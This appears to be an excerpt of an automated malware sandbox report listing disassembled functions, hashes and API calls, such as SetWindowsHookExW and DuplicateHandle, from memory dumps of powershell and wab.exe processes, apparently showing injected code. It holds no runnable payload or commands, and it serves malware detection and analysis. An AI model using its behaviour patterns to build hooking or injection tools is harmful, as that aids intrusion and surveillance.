                                                                                                        • Instruction Fuzzy Hash: 7CF0E235A093609FD752CB65C849E16FB71AF82215B1CD0D6E2858F092C731D943CB60
                                                                                                        Function 00C4FBD4 Relevance: .0, Instructions: 30COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.1668861808.0000000000C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C40000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_c40000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 1421fa87b95f638258ebd3bda8b14675ace5bd65996236ef9720efb53c966783
                                                                                                        • Instruction ID: 123421fb43f70c3932ba4bd8adaa72c33481e7da2855bf1a10c3909232c1add1
                                                                                                        • Opcode Fuzzy Hash: 1421fa87b95f638258ebd3bda8b14675ace5bd65996236ef9720efb53c966783
                                                                                                        • Instruction Fuzzy Hash: 4AF05435A00118AFCF50CB89D8509EDF7B6FF8C221B248159E469B3251C732DD52CF50
                                                                                                        Function 00C4FC28 Relevance: .0, Instructions: 24COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.1668861808.0000000000C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C40000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_c40000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 67578998e498f67ccc00bcd27d352d4d1283bf4c6fdcc3abccce38f0bbd78641
                                                                                                        • Instruction ID: cf2d24951f0c9c43dfaafbebc2cb6ad2c5b9edc4cd4ad2fe8b4c71d6aaf80fa6
                                                                                                        • Opcode Fuzzy Hash: 67578998e498f67ccc00bcd27d352d4d1283bf4c6fdcc3abccce38f0bbd78641
                                                                                                        • Instruction Fuzzy Hash: EBE04F35B012148FDB01CB58DC916EDF3B1EF89224B2482A9D428DB2A2C7369D07CB90

                                                                                                        Non-executed Functions

                                                                                                        Function 06E374F8 Relevance: 10.3, Strings: 8, Instructions: 305COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.1676301433.0000000006E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E30000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_6e30000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: (fl$(fl$(fl$(fl$(fl$(fl$(fl$(fl
                                                                                                        • API String ID: 0-747792303
                                                                                                        • Opcode ID: 77dc74880826888ffcdc51741bbb37246254340dcc9df79ada7ee934753f87c3
                                                                                                        • Instruction ID: f0f7cd7f48d86e3eecfc872d839defe381b9fb32c7593a77940d7130a3f59e54
                                                                                                        • Opcode Fuzzy Hash: 77dc74880826888ffcdc51741bbb37246254340dcc9df79ada7ee934753f87c3
                                                                                                        • Instruction Fuzzy Hash: 54C1CFB0E00324DBDF64CFA4C919B6AB7F2AF89314F24942AD8466B744CB71EC41CB95
                                                                                                        Function 06E3D378 Relevance: 7.7, Strings: 6, Instructions: 191COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.1676301433.0000000006E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E30000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_6e30000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: (fl$(fl$(fl$(fl$4l$4l
                                                                                                        • API String ID: 0-2748119719
                                                                                                        • Opcode ID: 7995e9a853aeaaada5ef9765abf3c566ec2946c95e599b57fdb993a80dbae443
                                                                                                        • Instruction ID: 4286f42a719997d1a6397e2ba336f779a54f3e24125bc40df5201b7293b0e4b5
                                                                                                        • Opcode Fuzzy Hash: 7995e9a853aeaaada5ef9765abf3c566ec2946c95e599b57fdb993a80dbae443
                                                                                                        • Instruction Fuzzy Hash: B961C070F00314DFDB64CB68C859BAAB7F3AF89218F249469D406AB355DB71EC42CB91
                                                                                                        Function 06E3F920 Relevance: 5.5, Strings: 4, Instructions: 477COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.1676301433.0000000006E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E30000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_6e30000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: l$l$l$l
                                                                                                        • API String ID: 0-2658161240
                                                                                                        • Opcode ID: 53940227aa8a349694c0b46a557f80465ec8389517e04e5ce6258de17441968f
                                                                                                        • Instruction ID: 17a7f659b7fa57867c10300aec560a7af225f3a77e6a30462f2c943cb3c91641
                                                                                                        • Opcode Fuzzy Hash: 53940227aa8a349694c0b46a557f80465ec8389517e04e5ce6258de17441968f
                                                                                                        • Instruction Fuzzy Hash: B5F12632F043259FDBA49F6894197AABBB2AFC5224F24806AD446DF351DB31CD41CBA1
                                                                                                        Function 06E3E908 Relevance: 5.4, Strings: 4, Instructions: 399COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.1676301433.0000000006E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E30000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_6e30000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 84l$84l$84l$84l
                                                                                                        • API String ID: 0-3024328185
                                                                                                        • Opcode ID: d72685cbc04c345712328b52e34f33c72a80c9a69050498ee73bf7d7848c4dfa
                                                                                                        • Instruction ID: 3b9c38902f4c2499d45f85516da4d85f30ce03e21cea25e927763ec83a797b54
                                                                                                        • Opcode Fuzzy Hash: d72685cbc04c345712328b52e34f33c72a80c9a69050498ee73bf7d7848c4dfa
                                                                                                        • Instruction Fuzzy Hash: A6D12931B003649FDB65DF64C409B6ABBB2AFC5314F64846AE806AF391DB71DC41CB91
                                                                                                        Function 06E3D630 Relevance: 5.4, Strings: 4, Instructions: 393COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.1676301433.0000000006E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E30000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_6e30000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: (fl$(fl$(fl$(fl
                                                                                                        • API String ID: 0-2123353879
                                                                                                        • Opcode ID: e87f87b44433781ef5ecb317ba6379443d78e9a0aed939711293f1b945b2091c
                                                                                                        • Instruction ID: ce05d22c5f1bc2f95529ad61cdc8be4076bb0ce69ecca301a165b6a91c80d500
                                                                                                        • Opcode Fuzzy Hash: e87f87b44433781ef5ecb317ba6379443d78e9a0aed939711293f1b945b2091c
                                                                                                        • Instruction Fuzzy Hash: CBF19374E00324DFDB64CFA4C949A6AB7B2BF89318F249169D805AF745CB71EC42CB91
                                                                                                        Function 06E374DA Relevance: 5.3, Strings: 4, Instructions: 268COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.1676301433.0000000006E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E30000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_6e30000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: (fl$(fl$(fl$(fl
                                                                                                        • API String ID: 0-2123353879
                                                                                                        • Opcode ID: 990fcc4ce7b1b766f6c5ec532df5d52a81427a9042729f53fde9ceb4577b797f
                                                                                                        • Instruction ID: c7871425140c87f1410dce8a2d05c97fd42cf52026048b28623595c4f01fbf3d
                                                                                                        • Opcode Fuzzy Hash: 990fcc4ce7b1b766f6c5ec532df5d52a81427a9042729f53fde9ceb4577b797f
                                                                                                        • Instruction Fuzzy Hash: B1A1BCB4E00324DFDF64CF94C458AAAB7B2BF89319F24956AD8066B744C732EC41CB84
                                                                                                        Function 06E37238 Relevance: 5.2, Strings: 4, Instructions: 192COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.1676301433.0000000006E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E30000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_6e30000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: (fl$(fl$(fl$(fl
                                                                                                        • API String ID: 0-2123353879
                                                                                                        • Opcode ID: f1b54ac561b2005fa775bb78850c58fa11d76f57196b337b35ac47d5a710d01c
                                                                                                        • Instruction ID: 6691ed014a4e2781c1c53a420950a7f8bd37c8f59da2b03800eab8277d3a748a
                                                                                                        • Opcode Fuzzy Hash: f1b54ac561b2005fa775bb78850c58fa11d76f57196b337b35ac47d5a710d01c
                                                                                                        • Instruction Fuzzy Hash: 71718EB0E00314DFDB64CF94C549AAABBB2AF89314F249069E805AF355CB71EC42CF95

                                                                                                        Execution Graph

                                                                                                        Execution Coverage:5.5%
                                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                                        Signature Coverage:0%
                                                                                                        Total number of Nodes:14
                                                                                                        Total number of Limit Nodes:2
                                                                                                        execution_graph 14541 22fd7128 14542 22fd716e GetCurrentProcess 14541->14542 14544 22fd71b9 14542->14544 14545 22fd71c0 GetCurrentThread 14542->14545 14544->14545 14546 22fd71fd GetCurrentProcess 14545->14546 14547 22fd71f6 14545->14547 14548 22fd7233 14546->14548 14547->14546 14549 22fd725b GetCurrentThreadId 14548->14549 14550 22fd728c 14549->14550 14535 22fd7370 DuplicateHandle 14536 22fd7406 14535->14536 14537 22fd2270 14538 22fd22b4 SetWindowsHookExW 14537->14538 14540 22fd22fa 14538->14540

                                                                                                        Executed Functions

                                                                                                        Function 22FD711A Relevance: 6.1, APIs: 4, Instructions: 131threadCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                        • GetCurrentProcess.KERNEL32 ref: 22FD71A6
                                                                                                        • GetCurrentThread.KERNEL32 ref: 22FD71E3
                                                                                                        • GetCurrentProcess.KERNEL32 ref: 22FD7220
                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 22FD7279
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.3134787188.0000000022FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 22FD0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_22fd0000_wab.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Current$ProcessThread
                                                                                                        • String ID:
                                                                                                        • API String ID: 2063062207-0
                                                                                                        • Opcode ID: 8f01c36f247a5c660118bcb4b1be80deeac18fcceaa1d495ebd2eae2e290dbbd
                                                                                                        • Instruction ID: d6bf56387ee857d8dd1bc56d24aea7fbf5141ff356f87444cafcafd80f422a4a
                                                                                                        • Opcode Fuzzy Hash: 8f01c36f247a5c660118bcb4b1be80deeac18fcceaa1d495ebd2eae2e290dbbd
                                                                                                        • Instruction Fuzzy Hash: AD5188B19003498FDB14CFAAD588BEEBBF1EF48300F248559E559AB360D7745880CF65
                                                                                                        Function 22FD7128 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                        • GetCurrentProcess.KERNEL32 ref: 22FD71A6
                                                                                                        • GetCurrentThread.KERNEL32 ref: 22FD71E3
                                                                                                        • GetCurrentProcess.KERNEL32 ref: 22FD7220
                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 22FD7279
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.3134787188.0000000022FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 22FD0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_22fd0000_wab.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Current$ProcessThread
                                                                                                        • String ID:
                                                                                                        • API String ID: 2063062207-0
                                                                                                        • Opcode ID: d794cf4aa1a43b13ef569a5f321254878a648d645f7ef843abc46741ca6c4246
                                                                                                        • Instruction ID: 1f4026df2d3fb6816175042f46b096d64ec98a3b389a07d474eea517ae5ce54a
                                                                                                        • Opcode Fuzzy Hash: d794cf4aa1a43b13ef569a5f321254878a648d645f7ef843abc46741ca6c4246
                                                                                                        • Instruction Fuzzy Hash: F85167B19003498FDB14DFAAD584BDEBBF1AF48300F248559E519AB350D7746980CF65
                                                                                                        Function 22FD7368 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 44 22fd7368-22fd736d 45 22fd736f 44->45 46 22fd7372-22fd7404 DuplicateHandle 44->46 45->46 47 22fd740d-22fd742a 46->47 48 22fd7406-22fd740c 46->48 48->47
                                                                                                        APIs
                                                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 22FD73F7
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.3134787188.0000000022FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 22FD0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_22fd0000_wab.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: DuplicateHandle
                                                                                                        • String ID:
                                                                                                        • API String ID: 3793708945-0
                                                                                                        • Opcode ID: cd3a25e06b9c6d8a2d7764da1114393dd18428af5f2b7ed2d869a033d2c84553
                                                                                                        • Instruction ID: d204af300c52c98cc0cd6aa9f39e4d3caeb6c6e8c3a3e57995173ac305fbcf0d
                                                                                                        • Opcode Fuzzy Hash: cd3a25e06b9c6d8a2d7764da1114393dd18428af5f2b7ed2d869a033d2c84553
                                                                                                        • Instruction Fuzzy Hash: A921E3B6D00349EFDB10CFAAD984AEEFBF5EB48310F14841AE954A7210D374A951CFA5
                                                                                                        Function 22FD7370 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 51 22fd7370-22fd7404 DuplicateHandle 52 22fd740d-22fd742a 51->52 53 22fd7406-22fd740c 51->53 53->52
                                                                                                        APIs
                                                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 22FD73F7
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.3134787188.0000000022FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 22FD0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_22fd0000_wab.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: DuplicateHandle
                                                                                                        • String ID:
                                                                                                        • API String ID: 3793708945-0
                                                                                                        • Opcode ID: bdfa857ec4f807d023c3d69471d9029c8831657e6a7ba3cea8bd8328ac8e0122
                                                                                                        • Instruction ID: 582a7585e038ce6bdc841ad415ea401d109cbe61d3b1e0ebf439eb09ab5a6108
                                                                                                        • Opcode Fuzzy Hash: bdfa857ec4f807d023c3d69471d9029c8831657e6a7ba3cea8bd8328ac8e0122
                                                                                                        • Instruction Fuzzy Hash: B121E3B59003499FDB10CFAAD984ADEBBF5EB48310F14841AE954A7210D374A940CFA5
                                                                                                        Function 22FD2269 Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 56 22fd2269-22fd22ba 59 22fd22bc 56->59 60 22fd22c6-22fd22f8 SetWindowsHookExW 56->60 63 22fd22c4 59->63 61 22fd22fa-22fd2300 60->61 62 22fd2301-22fd2326 60->62 61->62 63->60
                                                                                                        APIs
                                                                                                        • SetWindowsHookExW.USER32(?,00000000,?,?), ref: 22FD22EB
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.3134787188.0000000022FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 22FD0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_22fd0000_wab.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: HookWindows
                                                                                                        • String ID:
                                                                                                        • API String ID: 2559412058-0
                                                                                                        • Opcode ID: fd87b2c66174a46b905a25b5871d36ef9b521904f2ed65d49fbe0f86f1a1f9cf
                                                                                                        • Instruction ID: 5f59ce196552f2530f82399ea6358f8cab869024a0345cb1b62ae8a474cf27f4
                                                                                                        • Opcode Fuzzy Hash: fd87b2c66174a46b905a25b5871d36ef9b521904f2ed65d49fbe0f86f1a1f9cf
                                                                                                        • Instruction Fuzzy Hash: 5A2135B2D002089FDB14CFAAC944BEEBBF5FF88310F148429E554A7250C7B4A940CFA5
                                                                                                        Function 22FD2270 Relevance: 1.6, APIs: 1, Instructions: 58COMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 67 22fd2270-22fd22ba 69 22fd22bc 67->69 70 22fd22c6-22fd22f8 SetWindowsHookExW 67->70 73 22fd22c4 69->73 71 22fd22fa-22fd2300 70->71 72 22fd2301-22fd2326 70->72 71->72 73->70
                                                                                                        APIs
                                                                                                        • SetWindowsHookExW.USER32(?,00000000,?,?), ref: 22FD22EB
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.3134787188.0000000022FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 22FD0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_22fd0000_wab.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: HookWindows
                                                                                                        • String ID:
                                                                                                        • API String ID: 2559412058-0
                                                                                                        • Opcode ID: 3d6c644236521daac377cfe4f4d14eba773f5a767d693cec27ae06190875b06a
                                                                                                        • Instruction ID: 5dde916b20d06f591d6a5039f504df23b0adc7b8a909f94c266181685c45cf78
                                                                                                        • Opcode Fuzzy Hash: 3d6c644236521daac377cfe4f4d14eba773f5a767d693cec27ae06190875b06a
                                                                                                        • Instruction Fuzzy Hash: 1B2115B6D002099FDB14CFAAC944BEEBBF5FF88310F148429E555A7250C7B5A940CFA5
                                                                                                        Function 0326D500 Relevance: .1, Instructions: 75COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.3113591711.000000000326D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0326D000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_326d000_wab.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: b27b4501d656335af2d0885a2b87c10bc4cc7d593fe6aecfed62fc1fea3dd350
                                                                                                        • Instruction ID: 7f545c40778cb8d29ecb2c25692f26edd3423acf297601be31308e1df998ca59
                                                                                                        • Opcode Fuzzy Hash: b27b4501d656335af2d0885a2b87c10bc4cc7d593fe6aecfed62fc1fea3dd350
                                                                                                        • Instruction Fuzzy Hash: 6C2145B1614208DFDB15DF14D9D0B26BF65FF88318F28C1A9D80A0B646C376D8C6CAA2
                                                                                                        Function 0326D414 Relevance: .1, Instructions: 75COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.3113591711.000000000326D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0326D000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_326d000_wab.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: d3d19ce4177a43d8ef1817d521b8dea9ab61a77652eaf09270699fc522e8cd19
                                                                                                        • Instruction ID: e0fee47d9da82c9d3c37dcefa4a75f691bbd9c24da7245493c160e8484fca78c
                                                                                                        • Opcode Fuzzy Hash: d3d19ce4177a43d8ef1817d521b8dea9ab61a77652eaf09270699fc522e8cd19
                                                                                                        • Instruction Fuzzy Hash: 04213671614248DFDB15DF10C8C0F26FB65FF84324F28C1A9D8090B246C376E8D6CAA2
                                                                                                        Function 0327D0FC Relevance: .1, Instructions: 72COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.3113639989.000000000327D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0327D000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_327d000_wab.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 9bf69634367ac1ef4e7c9e715abe40fbdff0ddb9b0ccfcc8c037fdb645eb561c
                                                                                                        • Instruction ID: 4ef1d3688a3d8279eed2bca5ee80fd9a2736f8fd3867e70ffef2cf00cb214972
                                                                                                        • Opcode Fuzzy Hash: 9bf69634367ac1ef4e7c9e715abe40fbdff0ddb9b0ccfcc8c037fdb645eb561c
                                                                                                        • Instruction Fuzzy Hash: 722126B5614344DFDB05DF14D9C0B26BBA5FF88724F28C9ADD8094B246C37BD886CA62
                                                                                                        Function 0326D4FB Relevance: .1, Instructions: 56COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.3113591711.000000000326D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0326D000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_326d000_wab.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 73e1b4bd02456bd9de632c7bd58e40b6d0373997ece5d6ad877a492ea31b6635
                                                                                                        • Instruction ID: cc093ade0648dcbb8dac62d4497885477b73a05adfb12a2a8d4f158467440ffe
                                                                                                        • Opcode Fuzzy Hash: 73e1b4bd02456bd9de632c7bd58e40b6d0373997ece5d6ad877a492ea31b6635
                                                                                                        • Instruction Fuzzy Hash: 6811AFB6504244CFDB16CF10D5D4B16BF61FF84314F2885A9D8494B656C33AD49ACBA2
                                                                                                        Function 0326D40F Relevance: .1, Instructions: 56COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.3113591711.000000000326D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0326D000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_326d000_wab.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 73e1b4bd02456bd9de632c7bd58e40b6d0373997ece5d6ad877a492ea31b6635
                                                                                                        • Instruction ID: b16fc5f2593353a28ba5d4f62a8c4196806474d8bdf347d2dca58f12b00200ea
                                                                                                        • Opcode Fuzzy Hash: 73e1b4bd02456bd9de632c7bd58e40b6d0373997ece5d6ad877a492ea31b6635
                                                                                                        • Instruction Fuzzy Hash: 2D119D76504284DFCB16CF10D5C4B16FF62FF84324F28C5A9D8494B656C33AE896CBA2
                                                                                                        Function 0327D0F7 Relevance: .1, Instructions: 53COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.3113639989.000000000327D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0327D000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_327d000_wab.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 400768c402500e0810e25ff10fc9f67231d92f9f2dab9f09d81619b13d114b48
                                                                                                        • Instruction ID: a818f240a3a8d22d96e67ee18461fdf2d64f5adfac743869ee362192ee38450f
                                                                                                        • Opcode Fuzzy Hash: 400768c402500e0810e25ff10fc9f67231d92f9f2dab9f09d81619b13d114b48
                                                                                                        • Instruction Fuzzy Hash: 9911BB75504280CFDB06CF10DAC4B15BBA1FF84614F28CAAAD8494B656C33AD88ACB62